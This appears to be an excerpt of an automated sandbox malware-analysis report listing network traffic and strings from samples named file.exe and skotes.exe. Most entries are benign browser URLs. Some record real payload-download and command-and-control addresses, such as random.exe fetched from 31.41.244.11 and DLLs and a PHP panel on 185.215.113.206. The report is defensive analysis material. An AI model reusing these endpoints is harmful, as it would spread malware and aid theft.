Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11

Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log4.12.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log4.12.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log4.12.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

DoH DNS queries detected: name: c.msn.com

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4831Host: login.live.com

Source: file.exe, 00000000.00000002.2687486247.0000000023391000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2662001774.0000000000662000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2662001774.0000000000662000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeY
Source: file.exe, 00000000.00000002.2662001774.000000000061E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2662760280.0000000000FE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2662001774.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2662001774.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/#
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllw3
Source: file.exe, 00000000.00000002.2662001774.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2662001774.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllJ
Source: file.exe, 00000000.00000002.2687486247.0000000023391000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllm0
Source: file.exe, 00000000.00000002.2662001774.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllk4X
Source: file.exe, 00000000.00000002.2687486247.0000000023400000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2662760280.0000000000FE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpFS
Source: file.exe, 00000000.00000002.2687486247.0000000023400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpSd
Source: file.exe, 00000000.00000002.2687486247.0000000023400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpZd
Source: file.exe, 00000000.00000002.2687486247.0000000023400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpad5
Source: file.exe, 00000000.00000002.2662760280.0000000000FE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: file.exe, 00000000.00000002.2662001774.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpsoft
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~Q=
Source: file.exe, 00000000.00000002.2662760280.0000000000FE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206ngineer
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpY
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpm
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpw
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11//Zu7JuNko/index.phpE
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/A
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.3388611571.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe06ncoded
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe1
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe3b31
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe3b31d
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe506238476
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe5062384760
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exeR;
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exen
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exephp
Source: skotes.exe, 0000001C.00000002.3388611571.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exes
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_569.8.dr	String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2692174444.000000006FD5D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2680904258.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691555267.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, JJEGCBGI.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_569.8.dr	String found in binary or memory: https://apis.google.com
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://assets.msn.cn/resolver/
Source: 74628cf2-426f-44c9-9415-16f2cf6683fe.tmp.13.dr	String found in binary or memory: https://assets.msn.com
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: file.exe, 00000000.00000002.2687486247.00000000233F3000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2687486247.00000000233F3000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL.13.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.12.dr	String found in binary or memory: https://c.msn.com/
Source: file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, JJEGCBGI.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2438637160.000000002339F000.00000004.00000020.00020000.00000000.sdmp, AEGHJKJK.0.dr, JJEGCBGI.0.dr, Web Data.12.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2438637160.000000002339F000.00000004.00000020.00020000.00000000.sdmp, AEGHJKJK.0.dr, JJEGCBGI.0.dr, Web Data.12.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json.12.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.12.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: 74628cf2-426f-44c9-9415-16f2cf6683fe.tmp.13.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json0.12.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 74628cf2-426f-44c9-9415-16f2cf6683fe.tmp.13.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: file.exe, 00000000.00000002.2687486247.00000000233F3000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2687486247.00000000233F3000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Reporting and NEL.13.dr	String found in binary or memory: https://deff.nelreports.net/api/report
Source: 2cc80dabc69f58b6_0.12.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Reporting and NEL.13.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
Source: manifest.json0.12.dr	String found in binary or memory: https://docs.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.12.dr	String found in binary or memory: https://drive.google.com/
Source: file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2438637160.000000002339F000.00000004.00000020.00020000.00000000.sdmp, AEGHJKJK.0.dr, JJEGCBGI.0.dr, Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2438637160.000000002339F000.00000004.00000020.00020000.00000000.sdmp, AEGHJKJK.0.dr, JJEGCBGI.0.dr, Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2438637160.000000002339F000.00000004.00000020.00020000.00000000.sdmp, AEGHJKJK.0.dr, JJEGCBGI.0.dr, Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 74628cf2-426f-44c9-9415-16f2cf6683fe.tmp.13.dr	String found in binary or memory: https://edgeassetservice.azureedge.net
Source: 000003.log4.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log4.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log4.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log7.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr, HubApps Icons.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: 370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
